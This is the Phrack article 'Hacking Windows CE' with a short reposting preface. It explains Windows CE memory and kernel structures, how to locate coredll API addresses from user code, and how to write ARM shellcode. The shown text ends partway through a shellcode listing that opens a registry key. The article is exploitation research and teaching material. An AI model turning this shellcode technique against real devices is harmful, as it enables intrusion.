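  • Excerpt: Hacking Windows CE

    An article by a friend. It analyzes the same system but from a different
    angle, and it is well worth studying.

    Since it was written by a Chinese author, there really ought to be a
    matching Chinese edition. A strong protest to san~~! ;)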



    ==Phrack Inc.==

                  Volume 0x0b, Issue 0x3f, Phile #0x06 of 0x14

    |=----------------------------------------------------------------------=|
    |=----------------------=[ Hacking Windows CE ]=------------------------=|
    |=----------------------------------------------------------------------=|
    |=----------------------=[ san <san@xfocus.org> ]=----------------------=|

    --[ Contents

        1 - Abstract

        2 - Windows CE Overview

        3 - ARM Architecture

        4 - Windows CE Memory Management

        5 - Windows CE Processes and Threads

        6 - Windows CE API Address Search Technology

        7 - The Shellcode for Windows CE

        8 - System Call

        9 - Windows CE Buffer Overflow Exploitation

       10 - About Decoding Shellcode

       11 - Conclusion

       12 - Greetings

       13 - References


    --[ 1 - Abstract

    The network features of PDAs and mobile phones are becoming more and more
    powerful, so their security problems are attracting more and more
    attention. This paper shows a buffer overflow exploitation example on
    Windows CE. It covers the ARM architecture, memory management, and the
    features of processes and threads in Windows CE. It also shows how to
    write shellcode for Windows CE, including how to write decoding shellcode
    for Windows CE on ARM processors.


    --[ 2 - Windows CE Overview

    Windows CE is a very popular embedded operating system for PDAs and
    mobile phones. As the name suggests, it is developed by Microsoft.
    Because its APIs are similar to those of desktop Windows, Windows
    developers can easily write applications for Windows CE, which may be an
    important reason for its popularity. Windows CE 5.0 is the latest
    version, but Windows CE.net (4.2) is the most commonly used one, and this
    paper is based on Windows CE.net.

    For marketing reasons, Windows Mobile Software for Pocket PC and
    Smartphone are positioned as independent products, but they are also
    based on the Windows CE core.

    By default, Windows CE is in little-endian mode and it supports several
    processors.


    --[ 3 - ARM Architecture

    The ARM processor is the most popular chip in PDAs and mobile phones;
    almost all of these embedded devices use an ARM CPU. ARM processors are
    typical RISC processors in that they implement a load/store architecture:
    only load and store instructions can access memory, and data processing
    instructions operate on register contents only.

    There are six major versions of ARM architecture. These are denoted by
    the version numbers 1 to 6.

    ARM processors support up to seven processor modes, depending on the
    architecture version. These modes are: User, FIQ-Fast Interrupt Request,
    IRQ-Interrupt Request, Supervisor, Abort, Undefined and System. The System
    mode requires ARM architecture v4 and above. All modes except User mode
    are referred to as privileged modes. Applications usually execute in User
    mode, but on Pocket PC all applications appear to run in kernel mode; we
    will come back to this later.

    ARM processors have 37 registers. The registers are arranged in partially
    overlapping banks. There is a different register bank for each processor
    mode. The banked registers give rapid context switching for dealing with
    processor exceptions and privileged operations.

    In ARM architecture v3 and above, there are 30 general-purpose 32-bit
    registers, the program counter(pc) register, the Current Program Status
    Register(CPSR) and five Saved Program Status Registers(SPSRs). Fifteen
    general-purpose registers are visible at any one time, depending on the
    current processor mode. The visible general-purpose registers are from r0
    to r14.

    By convention, r13 is used as a stack pointer(sp) in ARM assembly language.
    The C and C++ compilers always use r13 as the stack pointer.

    In User mode and System mode, r14 is used as a link register(lr) to store
    the return address when a subroutine call is made. It can also be used as
    a general-purpose register if the return address is stored in the stack.

    The program counter is accessed as r15(pc). It is incremented by four
    bytes for each instruction in ARM state, or by two bytes in Thumb state.
    Branch instructions load the destination address into the pc register.

    You can load the pc register directly using data processing instructions.
    This differs from most other processors and is useful when writing
    shellcode.


    --[ 4 - Windows CE Memory Management

    Understanding memory management is very important for buffer overflow
    exploitation. Memory management in Windows CE is very different from that
    of other operating systems, even other Windows systems.

    Windows CE uses ROM (read only memory) and RAM (random access memory).

    The ROM stores the entire operating system, as well as the applications
    that are bundled with the system. In this sense, the ROM in a Windows CE
    system is like a small read-only hard disk. The data in ROM is retained
    without battery power. ROM-based DLL files can be designated as Execute
    in Place (XIP), a new feature of Windows CE.net. That is, they're
    executed directly from the ROM instead of being loaded into program RAM
    and then executed. This is a big advantage for embedded systems: the DLL
    code doesn't take up valuable program RAM and doesn't have to be copied
    into RAM before it's launched, so it takes less time to start an
    application. DLL files that aren't in ROM but are contained in the object
    store or on a Flash memory storage card aren't executed in place; they're
    copied into RAM and then executed.

    The RAM in a Windows CE system is divided into two areas: program memory
    and object store.

    The object store can be considered something like a permanent virtual RAM
    disk. Unlike the RAM disks on a PC, the object store maintains the files
    stored in it even if the system is turned off. This is the reason that
    Windows CE devices typically have a main battery and a backup battery.
    They provide power for the RAM to maintain the files in the object store.
    Even when the user hits the reset button, the Windows CE kernel starts up
    looking for a previously created object store in RAM and uses that store
    if it finds one.

    Another area of the RAM is used for the program memory. Program memory is
    used like the RAM in personal computers. It stores the heaps and stacks
    for the applications that are running. The boundary between the object
    store and the program RAM is adjustable. The user can move the dividing
    line between object store and program RAM using the System Control Panel
    applet.

    Windows CE is a 32-bit operating system, so it supports a 4GB virtual
    address space. The layout is as follows:

    +----------------------------------------+ 0xFFFFFFFF
    |   |   |  Kernel Virtual Address:       |
    |   | 2 |  KPAGE Trap Area,              |
    |   | G |  KDataStruct, etc              |
    |   | B |  ...                           |
    |   |   |--------------------------------+ 0xF0000000
    | 4 | K |  Static Mapped Virtual Address |
    | G | E |  ...                           |
    | B | R |  ...                           |
    |   | N |--------------------------------+ 0xC4000000
    | V | E |  NK.EXE                        |
    | I | L |--------------------------------+ 0xC2000000
    | R |   |  ...                           |
    | T |   |  ...                           |
    | U |---|--------------------------------+ 0x80000000
    | A |   |  Memory Mapped Files           |
    | L | 2 |  ...                           |
    |   | G |--------------------------------+ 0x42000000
    | A | B |  Slot 32 Process 32            |
    | D |   |--------------------------------+ 0x40000000
    | D | U |  ...                           |
    | R | S |--------------------------------+ 0x08000000
    | E | E |  Slot 3  DEVICE.EXE            |
    | S | R |--------------------------------+ 0x06000000
    | S |   |  Slot 2  FILESYS.EXE           |
    |   |   |--------------------------------+ 0x04000000
    |   |   |  Slot 1  XIP DLLs              |
    |   |   |--------------------------------+ 0x02000000
    |   |   |  Slot 0  Current Process       |
    +---+---+--------------------------------+ 0x00000000

    The upper 2GB is kernel space, used by the system for its own data, and
    the lower 2GB is user space. The range from 0x42000000 up to (but not
    including) 0x80000000 is used for large memory allocations such as
    memory-mapped files; the object store lives here as well. The range from
    0 up to 0x42000000 is divided into 33 slots of 32MB each.
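
    The slot arithmetic above can be sketched in a few lines of C. This is
    only an illustration under the layout shown in the diagram; the helper
    names slot_base and slot_of are hypothetical and do not come from the
    Windows CE headers.

```c
#include <assert.h>
#include <stdint.h>

#define SLOT_SHIFT 25u                  /* 32 MB = 1 << 25 bytes */
#define SLOT_SIZE  (1u << SLOT_SHIFT)
#define SLOT_COUNT 33u                  /* slots 0..32 */

/* Base address of a slot (hypothetical helper). */
uint32_t slot_base(uint32_t slot)
{
    assert(slot < SLOT_COUNT);
    return slot << SLOT_SHIFT;
}

/* Slot number containing a user-space address below 0x42000000. */
uint32_t slot_of(uint32_t addr)
{
    assert(addr < SLOT_COUNT * SLOT_SIZE);
    return addr >> SLOT_SHIFT;
}
```

    For example, slot_base(2) yields the FILESYS.EXE base 0x04000000 from the
    diagram, and slot_of(0x06000000) yields 3, the DEVICE.EXE slot.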

    Slot 0 is very important; it's for the currently running process. Its
    virtual address space layout is as follows:

    +---+------------------------------------+ 0x02000000
    |   |     DLL Virtual Memory Allocations |
    | S |   +--------------------------------|
    | L |   |  ROM DLLs:R/W Data             |
    | O |   |--------------------------------|
    | T |   |  RAM DLL+OverFlow ROM DLL:     |
    | 0 |   |  Code+Data                     |
    |   |   +--------------------------------|
    | C +------+-----------------------------|
    | U        |                  A          |
    | R        V                  |          |
    | R +-------------------------+----------|
    | E |  General Virtual Memory Allocations|
    | N |   +--------------------------------|
    | T |   |  Process VirtualAlloc() calls  |
    |   |   |--------------------------------|
    | P |   |       Thread Stack             |
    | R |   |--------------------------------|
    | O |   |       Process Heap             |
    | C |   |--------------------------------|
    | E |   |       Thread Stack             |
    | S |---+--------------------------------|
    | S |      Process Code and Data         |
    |   |------------------------------------+ 0x00010000
    |   |    Guard Section(64K)+UserKInfo    |
    +---+------------------------------------+ 0x00000000

    The first 64 KB is reserved by the OS. The process' code and data are
    mapped from 0x00010000, followed by the stacks and heaps. DLLs are loaded
    at the top addresses. One of the new features of Windows CE.net is the
    expansion of an application's virtual address space from 32 MB, in
    earlier versions of Windows CE, to 64 MB, because Slot 1 is used for XIP
    DLLs.


    --[ 5 - Windows CE Processes and Threads

    Windows CE treats processes differently from other Windows systems.
    Windows CE allows at most 32 processes to run at any one time. When the
    system starts, at least four processes are created: NK.EXE, which
    provides the kernel service and is always in slot 97; FILESYS.EXE, which
    provides the file system service and is always in slot 2; DEVICE.EXE,
    which loads and maintains the device drivers for the system and is
    normally in slot 3; and GWES.EXE, which provides the GUI support and is
    normally in slot 4. Other processes, such as EXPLORER.EXE, are started as
    well.

    Shell is an interesting process because it's not even in the ROM.
    SHELL.EXE is the Windows CE side of CESH, the command line-based monitor.
    The only way to load it is by connecting the system to the PC debugging
    station so that the file can be automatically downloaded from the PC. When
    you use Platform Builder to debug the Windows CE system, the SHELL.EXE
    will be loaded into the slot after FILESYS.EXE.

    Threads under Windows CE are similar to threads under other Windows
    systems. Each process has at least a primary thread associated with it
    upon starting, even if it never explicitly creates one. A process can
    create any number of additional threads, limited only by available
    memory.

    Each thread belongs to a particular process and shares the same memory
    space. But SetProcPermissions(-1) gives the current thread access to any
    process. Each thread has an ID, a private stack and a set of registers.
    The stack size of all threads created within a process is set by the
    linker when the application is compiled.

    The IDs of process and thread in Windows CE are the handles of the
    corresponding process and thread. It's funny, but it's useful while
    programming.

    When a process is loaded, the system assigns the next available slot to
    it. DLLs are loaded into the slot, followed by the stack and the default
    process heap. After that, the process starts executing.

    When a thread of a process is scheduled, the system copies the process
    from its slot into slot 0. It isn't a real copy operation; the process
    just seems to be mapped into slot 0. It is mapped back to the original
    slot allocated to the process when the process becomes inactive. The
    kernel, file system, and windowing system all run in their own slots.
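
    One consequence of this mapping is that the same memory can be named by
    a slot 0 address or by an address in the process' own slot. The sketch
    below shows the rebasing arithmetic only; map_to_slot is a hypothetical
    name, and the real kernel logic (for instance behind the MapPtrToProcess
    API) is assumed to be more involved than this.

```c
#include <assert.h>
#include <stdint.h>

#define SLOT_SHIFT 25u   /* each slot spans 32 MB */

/* If addr lies in slot 0, rebase it into the given process slot.
   Any other address is already absolute and is returned unchanged. */
uint32_t map_to_slot(uint32_t addr, uint32_t slot)
{
    assert(slot >= 1u && slot <= 32u);
    if ((addr >> SLOT_SHIFT) == 0u)
        return addr + (slot << SLOT_SHIFT);
    return addr;
}
```

    With this sketch, the slot 0 address 0x00011000 of a process living in
    slot 3 corresponds to 0x06011000.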

    A process allocates a stack for each thread. The default size is 64KB,
    depending on the link parameter used when the program is built. The top
    2KB is used to guard against stack overflow; we must not destroy this
    memory, otherwise the system will freeze. The remainder is available for
    use.
    Variables declared inside functions are allocated in the stack. Thread's
    stack memory is reclaimed when it terminates.


    --[ 6 - Windows CE API Address Search Technology

    Before exploiting anything, we need shellcode that runs under Windows CE.
    Windows CE implements a Win32-compatible API. Coredll provides the entry
    points for most APIs supported by Windows CE, so it is loaded by every
    process. The coredll.dll plays the role that kernel32.dll and ntdll.dll
    play on other Win32 systems. We have to find the addresses of the
    necessary APIs in coredll.dll and then use these APIs to implement our
    shellcode. The traditional method for shellcode on other Win32 systems
    is to locate the base address of kernel32.dll via the PEB structure and
    then search for API addresses via the PE header.

    Firstly, we have to locate the base address of the coredll.dll. Is there a
    structure like PEB under Windows CE? The answer is yes. KDataStruct is an
    important kernel structure that can be accessed from user mode using the
    fixed address PUserKData and it keeps important system data, such as
    module list, kernel heap, and API set pointer table (SystemAPISets).

    KDataStruct is defined in nkarm.h:

    // WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h
    struct KDataStruct {
        LPDWORD lpvTls;         /* 0x000 Current thread local storage pointer */
        HANDLE  ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */
        char    bResched;       /* 0x084 reschedule flag */
        char    cNest;          /* 0x085 kernel exception nesting */
        char    bPowerOff;      /* 0x086 TRUE during "power off" processing */
        char    bProfileOn;     /* 0x087 TRUE if profiling enabled */
        ulong   unused;         /* 0x088 unused */
        ulong   rsvd2;          /* 0x08c was DiffMSec */
        PPROCESS pCurPrc;       /* 0x090 ptr to current PROCESS struct */
        PTHREAD pCurThd;        /* 0x094 ptr to current THREAD struct */
        DWORD   dwKCRes;        /* 0x098  */
        ulong   handleBase;     /* 0x09c handle table base address */
        PSECTION aSections[64]; /* 0x0a0 section table for virtual memory */
        LPEVENT alpeIntrEvents[SYSINTR_MAX_DEVICES];/* 0x1a0 */
        LPVOID  alpvIntrData[SYSINTR_MAX_DEVICES];  /* 0x220 */
        ulong   pAPIReturn;     /* 0x2a0 direct API return address for kernel mode */
        uchar   *pMap;          /* 0x2a4 ptr to MemoryMap array */
        DWORD   dwInDebugger;   /* 0x2a8 !0 when in debugger */
        PTHREAD pCurFPUOwner;   /* 0x2ac current FPU owner */
        PPROCESS pCpuASIDPrc;   /* 0x2b0 current ASID proc */
        long    nMemForPT;      /* 0x2b4 - Memory used for PageTables */

        long    alPad[18];      /* 0x2b8 - padding */
        DWORD   aInfo[32];      /* 0x300 - misc. kernel info */
        // WINCE420\PUBLIC\COMMON\OAK\INC\pkfuncs.h
            #define KINX_PROCARRAY  0   /* 0x300 address of process array */
            #define KINX_PAGESIZE   1   /* 0x304 system page size */
            #define KINX_PFN_SHIFT  2   /* 0x308 shift for page # in PTE */
            #define KINX_PFN_MASK   3   /* 0x30c mask for page # in PTE */
            #define KINX_PAGEFREE   4   /* 0x310 # of free physical pages */
            #define KINX_SYSPAGES   5   /* 0x314 # of pages used by kernel */
            #define KINX_KHEAP      6   /* 0x318 ptr to kernel heap array */
            #define KINX_SECTIONS   7   /* 0x31c ptr to SectionTable array */
            #define KINX_MEMINFO    8   /* 0x320 ptr to system MemoryInfo struct */
            #define KINX_MODULES    9   /* 0x324 ptr to module list */
            #define KINX_DLL_LOW   10   /* 0x328 lower bound of DLL shared space */
            #define KINX_NUMPAGES  11   /* 0x32c total # of RAM pages */
            #define KINX_PTOC      12   /* 0x330 ptr to ROM table of contents */
            #define KINX_KDATA_ADDR 13  /* 0x334 kernel mode version of KData */
            #define KINX_GWESHEAPINFO 14 /* 0x338 Current amount of gwes heap in use */
            #define KINX_TIMEZONEBIAS 15 /* 0x33c Fast timezone bias info */
            #define KINX_PENDEVENTS 16  /* 0x340 bit mask for pending interrupt events */
            #define KINX_KERNRESERVE 17 /* 0x344 number of kernel reserved pages */
            #define KINX_API_MASK 18    /* 0x348 bit mask for registered api sets */
            #define KINX_NLS_CP 19      /* 0x34c hiword OEM code page, loword ANSI code page */
            #define KINX_NLS_SYSLOC 20  /* 0x350 Default System locale */
            #define KINX_NLS_USERLOC 21 /* 0x354 Default User locale */
            #define KINX_HEAP_WASTE 22  /* 0x358 Kernel heap wasted space */
            #define KINX_DEBUGGER 23    /* 0x35c For use by debugger for protocol communication */
            #define KINX_APISETS 24     /* 0x360 APIset pointers */
            #define KINX_MINPAGEFREE 25 /* 0x364 water mark of the minimum number of free pages */
            #define KINX_CELOGSTATUS 26 /* 0x368 CeLog status flags */
            #define KINX_NKSECTION  27  /* 0x36c Address of NKSection */
            #define KINX_PWR_EVTS   28  /* 0x370 Events to be set after power on */

            #define KINX_NKSIG     31   /* 0x37c last entry of KINFO -- signature when NK is ready */
            #define NKSIG          0x4E4B5347       /* signature "NKSG" */
                                /* 0x380 - interlocked api code */
                                /* 0x400 - end */
    };  /* KDataStruct */

    /* High memory layout
    *
    * This structure is mapped in at the end of the 4GB virtual
    * address space.
    *
    *  0xFFFD0000 - first level page table (uncached) (2nd half is r/o)
    *  0xFFFD4000 - disabled for protection
    *  0xFFFE0000 - second level page tables (uncached)
    *  0xFFFE4000 - disabled for protection
    *  0xFFFF0000 - exception vectors
    *  0xFFFF0400 - not used (r/o)
    *  0xFFFF1000 - disabled for protection
    *  0xFFFF2000 - r/o (physical overlaps with vectors)
    *  0xFFFF2400 - Interrupt stack (1k)
    *  0xFFFF2800 - r/o (physical overlaps with Abort stack & FIQ stack)
    *  0xFFFF3000 - disabled for protection
    *  0xFFFF4000 - r/o (physical memory overlaps with vectors & intr. stack & FIQ stack)
    *  0xFFFF4900 - Abort stack (2k - 256 bytes)
    *  0xFFFF5000 - disabled for protection
    *  0xFFFF6000 - r/o (physical memory overlaps with vectors & intr. stack)
    *  0xFFFF6800 - FIQ stack (256 bytes)
    *  0xFFFF6900 - r/o (physical memory overlaps with Abort stack)
    *  0xFFFF7000 - disabled
    *  0xFFFFC000 - kernel stack
    *  0xFFFFC800 - KDataStruct
    *  0xFFFFCC00 - disabled for protection (2nd level page table for 0xFFF00000)
    */


    The value of PUserKData is fixed as 0xFFFFC800 on the ARM processor, and
    0x00005800 on other CPUs. The last member of KDataStruct is aInfo, at
    offset 0x300 from the start of the KDataStruct structure. Member aInfo
    is a DWORD array; index 9 (KINX_MODULES, defined in pkfuncs.h) holds a
    pointer to the module list. So the pointer to the module list is at
    offset 0x324 from 0xFFFFC800.
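
    The offset arithmetic can be checked with a short C sketch. The
    constants come from the listing above; the helper name kinfo_addr is
    hypothetical. The function only computes an address and never
    dereferences it, so it can be tried on any host.

```c
#include <assert.h>
#include <stdint.h>

#define PUSER_KDATA   0xFFFFC800u  /* KDataStruct address on ARM      */
#define AINFO_OFFSET  0x300u       /* offset of aInfo[] in the struct */
#define KINX_MODULES  9u           /* index of the module list ptr    */
#define KINX_APISETS  24u          /* index of the API set pointers   */

/* Address of aInfo[index]; every entry is a 4-byte DWORD. */
uint32_t kinfo_addr(uint32_t index)
{
    assert(index < 32u);
    return PUSER_KDATA + AINFO_OFFSET + index * 4u;
}
```

    kinfo_addr(KINX_MODULES) evaluates to 0xFFFFCB24, that is 0xFFFFC800
    plus 0x324, matching the offset derived in the text.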

    Well, let's look at the Module structure. I marked the offsets of its
    members as follows:

    // WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h
    typedef struct Module {
        LPVOID      lpSelf;                 /* 0x00 Self pointer for validation */
        PMODULE     pMod;                   /* 0x04 Next module in chain */
        LPWSTR      lpszModName;            /* 0x08 Module name */
        DWORD       inuse;                  /* 0x0c Bit vector of use */
        DWORD       calledfunc;             /* 0x10 Called entry but not exit */
        WORD        refcnt[MAX_PROCESSES];  /* 0x14 Reference count per process*/
        LPVOID      BasePtr;                /* 0x54 Base pointer of dll load (not 0 based) */
        DWORD       DbgFlags;               /* 0x58 Debug flags */
        LPDBGPARAM  ZonePtr;                /* 0x5c Debug zone pointer */
        ulong       startip;                /* 0x60 0 based entrypoint */
        openexe_t   oe;                     /* 0x64 Pointer to executable file handle */
        e32_lite    e32;                    /* 0x74 E32 header */
        // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
          typedef struct e32_lite {           /* PE 32-bit .EXE header               */
              unsigned short  e32_objcnt;     /* 0x74 Number of memory objects            */
              BYTE            e32_cevermajor; /* 0x76 version of CE built for             */
              BYTE            e32_ceverminor; /* 0x77 version of CE built for             */
              unsigned long   e32_stackmax;   /* 0x78 Maximum stack size                  */
              unsigned long   e32_vbase;      /* 0x7c Virtual base address of module      */
              unsigned long   e32_vsize;      /* 0x80 Virtual size of the entire image    */
              unsigned long e32_sect14rva;    /* 0x84 section 14 rva */
              unsigned long e32_sect14size;   /* 0x88 section 14 size */
              struct info e32_unit[LITE_EXTRA]; /* 0x8c  Array of extra info units     */
                // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
                struct info {                       /* Extra information header block      */
                    unsigned long   rva;            /* Virtual relative address of info    */
                    unsigned long   size;           /* Size of information block           */
                }
                // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
                #define EXP             0           /* 0x8c Export table position          */
                #define IMP             1           /* 0x94 Import table position          */
                #define RES             2           /* 0x9c Resource table position        */
                #define EXC             3           /* 0xa4 Exception table position       */
                #define SEC             4           /* 0xac Security table position        */
                #define FIX             5           /* 0xb4 Fixup table position           */

                #define LITE_EXTRA      6           /* Only first 6 used by NK */ 
          } e32_lite, *LPe32_list;
        o32_lite    *o32_ptr;               /* 0xbc  O32 chain ptr */
        DWORD       dwNoNotify;             /* 0xc0  1 bit per process, set if notifications disabled */
        WORD        wFlags;                 /* 0xc4 */
        BYTE        bTrustLevel;            /* 0xc6 */
        BYTE        bPadding;               /* 0xc7 */
        PMODULE     pmodResource;           /* 0xc8 module that contains the resources */
        DWORD       rwLow;                  /* 0xcc base address of RW section for ROM DLL */
        DWORD       rwHigh;                 /* 0xd0 high address RW section for ROM DLL */
        PGPOOL_Q    pgqueue;                /* 0xd4 list of the page owned by the module */
    } Module;


    The Module structure is defined in kernel.h. Its third member is
    lpszModName, a pointer to the module name string, at offset 0x08 from
    the start of the structure. The module name is a Unicode string. The
    second member is pMod, which points to the next module in the chain. So
    we can locate the coredll module by walking the chain and comparing each
    module's Unicode name.
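
    The chain walk can be sketched in portable C as follows. This is a
    host-side illustration, not kernel code: MockModule is a simplified
    stand-in that keeps only the three fields the search needs, so the real
    offsets (0x04, 0x08, 0x7c) do not apply to it, and the names wstr_equal
    and find_module are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for the kernel's Module structure. */
typedef struct MockModule {
    struct MockModule *next;   /* plays the role of pMod        */
    const uint16_t    *name;   /* plays the role of lpszModName */
    uint32_t           vbase;  /* plays the role of e32_vbase   */
} MockModule;

/* Return 1 when two NUL-terminated UTF-16 strings are identical. */
int wstr_equal(const uint16_t *a, const uint16_t *b)
{
    assert(a != NULL && b != NULL);
    while (*a != 0 && *a == *b) {
        a++;
        b++;
    }
    return *a == *b;
}

/* Walk the chain until a module with the wanted name turns up. */
const MockModule *find_module(const MockModule *head, const uint16_t *wanted)
{
    const MockModule *m;

    for (m = head; m != NULL; m = m->next) {
        if (wstr_equal(m->name, wanted))
            return m;
    }
    return NULL;   /* end of chain reached without a match */
}
```

    The comparison is case-sensitive and exact, which is enough here because
    the name being searched for is a known constant.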

    At offset 0x74 from the start of the Module structure is the e32 member,
    an e32_lite structure defined in pehdr.h. In the e32_lite structure,
    member e32_vbase gives the virtual base address of the module; it is at
    offset 0x7c from the start of the Module structure. Also note the member
    e32_unit[LITE_EXTRA], an array of info structures. LITE_EXTRA is defined
    as 6 in pehdr.h; only the first 6 entries are used by NK, and the first
    is the export table position. So at offset 0x8c from the start of the
    Module structure is the relative virtual address of the module's export
    table.

    At this point we have the virtual base address of coredll.dll and the
    relative virtual address of its export table.

    I wrote the following small program to list all modules of the system:

    ; SetProcessorMode.s

        AREA    |.text|, CODE, ARM

        EXPORT    |SetProcessorMode|  
    |SetProcessorMode| PROC
        mov     r1, lr     ; different modes use different lr - save it
        msr     cpsr_c, r0 ; assign control bits of CPSR
        mov     pc, r1     ; return

        END

    // list.cpp
    /*
    ...
    01F60000 coredll.dll
    */

    #include "stdafx.h"

    extern "C" void __stdcall SetProcessorMode(DWORD pMode);

    int WINAPI WinMain( HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPTSTR    lpCmdLine,
                        int       nCmdShow)
    {
        FILE *fp;
        unsigned int KDataStruct = 0xFFFFC800;
        void *Modules     = NULL,
             *BaseAddress = NULL,
             *DllName     = NULL;
       
    // switch to user mode
    //SetProcessorMode(0x10);

        if ( (fp = fopen("\\modules.txt", "w")) == NULL )
        {
            return 1;
        }

        // aInfo[KINX_MODULES]
        Modules = *( ( void ** )(KDataStruct + 0x324));

        while (Modules) {
            BaseAddress = *( ( void ** )( ( unsigned char * )Modules + 0x7c ) );
            DllName     = *( ( void ** )( ( unsigned char * )Modules + 0x8 ) );

            fprintf(fp, "%08X %ls\n", BaseAddress, DllName);

            Modules = *( ( void ** )( ( unsigned char * )Modules + 0x4 ) );
        }

        fclose(fp);
        return(EXIT_SUCCESS);
    }

    In my environment, the Module structure is at 0x8F453128, which is in
    kernel space. Most Pocket PC ROMs were built with the Enable Full Kernel
    Mode option, so all applications appear to run in kernel mode. The low 5
    bits of the Psr register are 0x1F when debugging, which means the ARM
    processor runs in System mode. These values are defined in nkarm.h:

    // ARM processor modes
    #define USER_MODE   0x10    // 0b10000
    #define FIQ_MODE    0x11    // 0b10001
    #define IRQ_MODE    0x12    // 0b10010
    #define SVC_MODE    0x13    // 0b10011
    #define ABORT_MODE  0x17    // 0b10111
    #define UNDEF_MODE  0x1b    // 0b11011
    #define SYSTEM_MODE 0x1f    // 0b11111

    I wrote a small function in assembly to switch the processor mode because
    EVC doesn't support inline assembly. The program can't read BaseAddress
    and DllName after I switch the processor to User mode; it raises an
    access violation exception.
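
    To make the mode values concrete, here is a small C sketch that decodes
    the mode field of a status register value. The mode numbers are the ones
    from nkarm.h above; the function names mode_name and is_privileged are
    hypothetical.

```c
#include <stdint.h>

#define MODE_MASK 0x1Fu   /* low 5 bits of the PSR hold the mode */

/* Translate the mode bits of a PSR value into a readable name. */
const char *mode_name(uint32_t psr)
{
    switch (psr & MODE_MASK) {
    case 0x10: return "User";
    case 0x11: return "FIQ";
    case 0x12: return "IRQ";
    case 0x13: return "Supervisor";
    case 0x17: return "Abort";
    case 0x1B: return "Undefined";
    case 0x1F: return "System";
    default:   return "Invalid";
    }
}

/* Every mode except User mode is privileged. */
int is_privileged(uint32_t psr)
{
    return (psr & MODE_MASK) != 0x10u;
}
```

    The upper bits of the register (condition flags and so on) are masked
    off, so a value such as 0x6000001F still decodes as System mode.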

    Running this program without changing the processor mode, I found that
    the virtual base address of coredll.dll is 0x01F60000. But this address
    is invalid when I inspect it in the EVC debugger; the valid data starts
    at 0x01F61000. I think Windows CE doesn't load the header of DLL files,
    perhaps to save memory or time.

    Because we have the virtual base address of coredll.dll and the relative
    virtual address of its export table, we can get an API address by
    repeatedly comparing API names through the IMAGE_EXPORT_DIRECTORY
    structure. This structure is the same as on other Win32 systems and is
    defined in winnt.h:

    // WINCE420\PUBLIC\COMMON\SDK\INC\winnt.h
    typedef struct _IMAGE_EXPORT_DIRECTORY {
        DWORD   Characteristics;        /* 0x00 */
        DWORD   TimeDateStamp;          /* 0x04 */
        WORD    MajorVersion;           /* 0x08 */
        WORD    MinorVersion;           /* 0x0a */
        DWORD   Name;                   /* 0x0c */
        DWORD   Base;                   /* 0x10 */
        DWORD   NumberOfFunctions;      /* 0x14 */
        DWORD   NumberOfNames;          /* 0x18 */
        DWORD   AddressOfFunctions;     // 0x1c RVA from base of image
        DWORD   AddressOfNames;         // 0x20 RVA from base of image
        DWORD   AddressOfNameOrdinals;  // 0x24 RVA from base of image
    } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
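
    The name lookup through this structure can be sketched in portable C.
    This is a host-side illustration that treats a module image as a plain
    byte buffer; it compares full names rather than hashes, and the names
    rd32, rd16 and find_export_rva are hypothetical. The field offsets are
    the ones annotated in the structure above.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Field offsets inside IMAGE_EXPORT_DIRECTORY. */
#define EXP_NUMBER_OF_NAMES   0x18u
#define EXP_ADDR_OF_FUNCTIONS 0x1Cu
#define EXP_ADDR_OF_NAMES     0x20u
#define EXP_ADDR_OF_ORDINALS  0x24u

/* Little-endian 32-bit read from the image at a given RVA. */
static uint32_t rd32(const uint8_t *img, uint32_t rva)
{
    return (uint32_t)img[rva] | ((uint32_t)img[rva + 1] << 8) |
           ((uint32_t)img[rva + 2] << 16) | ((uint32_t)img[rva + 3] << 24);
}

/* Little-endian 16-bit read from the image at a given RVA. */
static uint16_t rd16(const uint8_t *img, uint32_t rva)
{
    return (uint16_t)(img[rva] | (img[rva + 1] << 8));
}

/* Return the RVA of the named export, or 0 if the name is not found.
   img is the module image, exp_rva the RVA of its export directory. */
uint32_t find_export_rva(const uint8_t *img, uint32_t exp_rva,
                         const char *name)
{
    uint32_t count, funcs, names, ords, i;

    assert(img != NULL && name != NULL);
    count = rd32(img, exp_rva + EXP_NUMBER_OF_NAMES);
    funcs = rd32(img, exp_rva + EXP_ADDR_OF_FUNCTIONS);
    names = rd32(img, exp_rva + EXP_ADDR_OF_NAMES);
    ords  = rd32(img, exp_rva + EXP_ADDR_OF_ORDINALS);

    for (i = 0; i < count; i++) {
        uint32_t name_rva = rd32(img, names + 4u * i);
        if (strcmp((const char *)(img + name_rva), name) == 0) {
            /* The i-th name maps to the i-th ordinal, which in turn
               indexes the function address array. */
            uint16_t ordinal = rd16(img, ords + 2u * i);
            return rd32(img, funcs + 4u * (uint32_t)ordinal);
        }
    }
    return 0;
}
```

    Adding the returned RVA to the module's virtual base address gives the
    callable address of the API.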


    --[ 7 - The Shellcode for Windows CE

    There are a few things to note before writing shellcode for Windows CE.
    Windows CE passes the first four parameters of an API in r0-r3; if an
    API takes more than four parameters, the rest are passed on the stack. So
    the shellcode must be written carefully, because the shellcode itself
    will sit on the stack. The test.asm is our shellcode:

    ; Idea from WinCE4.Dust written by Ratter/29A
    ;
    ; API Address Search
    ; san@xfocus.org
    ;
    ; armasm test.asm
    ; link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj 
     
        CODE32

        EXPORT  WinMainCRTStartup

        AREA    .text, CODE, ARM

    test_start

    ; r11 - base pointer
    test_code_start   PROC
        bl      get_export_section

        mov     r2, #4          ; functions number
        bl      find_func

        sub     sp, sp, #0x89, 30 ; weird after buffer overflow

        add     r0, sp, #8
        str     r0, [sp]
        mov     r3, #2
        mov     r2, #0
        adr     r1, key
        mov     r0, #0xA, 2
        mov     lr, pc
        ldr     pc, [r8, #-12] ; RegOpenKeyExW

        mov     r0, #1
        str     r0, [sp, #0xC]
        mov     r3, #4
        str     r3, [sp, #4]
        add     r1, sp, #0xC
        str     r1, [sp]
        ;mov     r2, #0
        adr     r1, val
        ldr     r0, [sp, #8]
        mov     lr, pc
